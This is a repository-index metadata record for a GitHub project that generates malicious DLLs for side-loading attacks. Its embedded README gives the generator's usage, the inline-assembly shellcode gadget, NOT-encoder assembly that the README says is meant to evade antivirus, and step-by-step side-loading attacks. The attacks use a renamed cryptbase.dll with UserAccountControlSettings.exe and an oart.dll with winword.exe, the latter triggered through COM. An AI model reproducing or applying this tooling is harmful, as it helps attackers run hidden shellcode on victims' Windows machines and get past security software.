{"id":17101925,"url":"https://github.com/nullarray/maliciousdllgen","last_synced_at":"2025-10-28T09:49:40.797Z","repository":{"id":140847975,"uuid":"278102777","full_name":"NullArray/MaliciousDLLGen","owner":"NullArray","description":"Malicious DLL Generator in Py3","archived":false,"fork":false,"pushed_at":"2020-07-08T14:05:21.000Z","size":12,"stargazers_count":26,"open_issues_count":0,"forks_count":5,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-09-02T11:34:42.190Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/NullArray.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2020-07-08T13:53:04.000Z","updated_at":"2024-08-12T20:03:30.000Z","dependencies_parsed_at":null,"dependency_job_id":"9bd73b20-6a44-4ef7-9006-039e9ab8f163","html_url":"https://github.com/NullArray/MaliciousDLLGen","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/NullArray/MaliciousDLLGen","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NullArray%2FMaliciousDLLGen","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NullArray%2FMaliciousDLLGen/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NullArray%2FMaliciousDLLGen/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NullArray%2FMaliciousDLLGen/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/NullArray","download_url":"https://codeload.github.com/NullArray/MaliciousDLLGen/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NullArray%2FMaliciousDLLGen/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281418065,"owners_count":26497723,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-28T02:00:06.022Z","response_time":60,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-14T15:27:27.678Z","updated_at":"2025-10-28T09:49:40.776Z","avatar_url":"https://github.com/NullArray.png","language":"C","readme":"# MaliciousDLLGenerator\n\nDLL Generator for side loading attack (Python 3 Compatible Version)\n\n## Note\n\nThis project was originally created by Mr.Un1k0d3r of RingZer0 Team I couldn't find a repository\nto the original or i would have sumitted a Pull Request. In lieu of that i decided to host it here.\n\nAll credit goes to Mr.Un1k0d3r and RingZer0 Team. All i did was make it Python 3 compatible.\n\n\n### Currently only support 64 bits shellcode\n\n# Usage\n\n```\n$ python gen-dll.py -h\n\nMaliciousDLLGenerator - Mr.Un1k0d3r - RingZer0 Team\n---------------------------------------------------\n\n\n[-] Shellcode size is limited to 1024 bytes\nusage: gen-dll.py [-h] -o OUTPUT -s SHELLCODE [-t TYPE]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -o OUTPUT, --output OUTPUT\n                        Output filename\n  -s SHELLCODE, --shellcode SHELLCODE\n                        Raw shellcode file path\n  -t TYPE, --type TYPE  DLL type (default,oart)\n```\n\n# Shellcode gadget\n\nInstead of using the standard shellcode calling structure\n\n```\nchar shellcode[] = {};\nint(*execute)(void);\nexecute = (int(*)())shellcode;\nexecute();\n```\n\nWhich result in the following assembly code\n\n```\ncall rax\n```\n\nThe DLL is mimicking a standard function return by using the following code\n\n```\n        CHAR payload[] = \"\";\n        asm volatile (\"mov %%rax, %0\\n\\t\"\n                     \"push %%rax\\n\\t\"\n                     \"ret\"\n                     :\n                     : \"r\" (payload));\n```\n\nWhich result in following assembly code\n\n```\nmov rax, rsp\npush rax\nret\n```\n\n# Compiling from source using GCC\n\n```\nC:\\\u003e x86_64-w64-mingw32-g++.exe -Wall -DBUILD_DLL -O2 -c maindll.cpp -o maindll.o\nC:\\\u003e x86_64-w64-mingw32-g++.exe -shared -Wl,--dll maindll.o -o yourdll.dll -s \n```\n\n# Compiling from ASM\n\n64 bits\n\n```\n$ nasm -felf64 encoder-64.asm -o encoder-64.o\n$ ld -N encoder-64.o -o encoder-64\n```\n\n32 bits\n\n```\n$ nasm -felf32 encoder-32.asm -o encoder-32.o\n$ ld -N -melf_i386 encoder-32.o -o encoder-32\n```\n\n# Obfuscation shellcode\n\nThe DLL encode the shellcode using a simple NOT encoder to avoid AV detection.\n\n# 64 bits NOT encoder source\n\n```\n_start:\n        call $ + 5\n        pop rbx\n        xor rax, rax\n        mov rcx, rax\n        mov cl, 128\n        add rbx, 16\n_loop:\n        not QWORD [rbx + rcx * 8]\n        loop _loop\n        add rbx, 8\n        push rbx\n        ret\n```\n\n# 32 bits NOT encoder source\n\n```\n_start:\n        call $ + 5\n        pop ebx\n        xor eax, eax\n        mov ecx, eax\n        mov cx, 256\n        add ebx, 18\n_loop:\n        not DWORD [ebx + ecx * 4]\n        loop _loop\n        add ebx, 4\n        push ebx\n        ret\n```\n\n# Attack examples\n\nUsing windows binaries\n\n```\ncopy C:\\windows\\system32\\UserAccountControlSettings.exe to a writable location\nadd the malicious dll in the same folder and rename it to cryptbase.dll\n```\n\n```\ncopy C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\winword.exe to a writable location\nadd the malicious dll (use the oart switch) in the same folder and rename it to oart.dll\n\nit can be trigged remotely using COM object. Winword can be started without GUI using the following command:\nC:\\yourpath\\winword.exe /Automation -Embedding\n```\n\n# Credit\nMr.Un1k0d3r RingZer0 Team\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnullarray%2Fmaliciousdllgen","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnullarray%2Fmaliciousdllgen","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnullarray%2Fmaliciousdllgen/lists"}